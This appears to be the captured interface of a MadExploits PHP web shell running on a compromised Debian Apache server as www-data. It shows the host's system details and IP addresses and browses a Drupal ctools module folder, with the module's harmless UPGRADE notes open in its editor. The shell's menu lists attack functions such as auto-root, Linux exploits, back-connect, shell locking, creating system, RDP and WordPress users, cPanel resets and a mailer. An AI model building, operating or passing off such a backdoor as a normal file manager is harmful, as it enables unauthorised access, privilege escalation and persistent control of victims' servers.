Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.116.89.70
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
[ HOME SHELL ]
Name
Size
Permission
Action
bulk_export
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
ctools_access_ruleset
[ DIR ]
drwxr-xr-x
ctools_ajax_sample
[ DIR ]
drwxr-xr-x
ctools_custom_content
[ DIR ]
drwxr-xr-x
ctools_plugin_example
[ DIR ]
drwxr-xr-x
drush
[ DIR ]
drwxr-xr-x
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
page_manager
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
stylizer
[ DIR ]
drwxr-xr-x
term_depth
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
views_content
[ DIR ]
drwxr-xr-x
API.txt
2.22
KB
-rw-r--r--
CHANGELOG.txt
5.05
KB
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
UPGRADE.txt
2.82
KB
-rw-r--r--
ctools.api.php
8.83
KB
-rw-r--r--
ctools.info
454
B
-rw-r--r--
ctools.install
7.51
KB
-rw-r--r--
ctools.module
31.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UPGRADE.txt
Upgrading from ctools-6.x-1.x to ctools-7.x-2.x: - Remove ctools_ajax_associate_url_to_element as it shouldn't be necessary with the new AJAX api's in Drupal core. - All calls to the ctools_ajax_command_prepend() should be replace with the core function ajax_command_prepend(); This is also the case for append, insert, after, before, replace, html, and remove commands. Each of these commands have been incorporated into the Drupal.ajax.prototype.commands.insert function with a corresponding parameter specifying which method to use. - All calls to ctools_ajax_render() should be replaced with calls to core ajax_render(). Note that ctools_ajax_render() printed the json object and exited, ajax_render() gives you this responsibility. ctools_ajax_render() becomes print ajax_render(); exit; - All calls to ctools_static*() should be replaced with corresponding calls to drupal_static*(). - All calls to ctools_css_add_css should be replaced with calls to drupal_add_css(). Note that the arguments to drupal_add_css() have changed. - All wizard form builder functions must now return a form array(). - ctools_build_form is very close to being removed. In anticipation of this, all $form_state['wrapper callback']s must now be $form_state['wrapper_callback']. In addition to this $form_state['args'] must now be $form_state['build_info']['args']. NOTE: Previously checking to see if the return from ctools_build_form() is empty would be enough to see if the form was submitted. This is no longer true. Please check for $form_state['executed']. If using a wizard check for $form_state['complete']. - Plugin types now must be explicitly registered via a registration hook, hook_ctools_plugin_type(); info once provided in magically-named functions (e.g., ctools_ctools_plugin_content_types() was the old function to provide plugin type info for ctools' content_type plugins) now must be provided in that global hook. See http://drupal.org/node/910538 for more details. - Plugins that use 'theme arguments' now use 'theme variables' instead. - Context, argument and relationship plugins now use 'add form' and/or 'edit form' rather than 'settings form'. These plugins now support form wizards just like content plugins. These forms now all take $form, &$form_state as arguments, and the configuration for the plugin can be found in $form_state['conf']. For all these forms, the submit handler MUST put appropriate data in $form_state['conf']. Data will no longer be stored automatically. For all of these forms, the separate settings #trees in the form are now gone, so form ids may be adjusted. Also, these are now all real forms using CTools form wizard instead of fake subforms as previously.
Close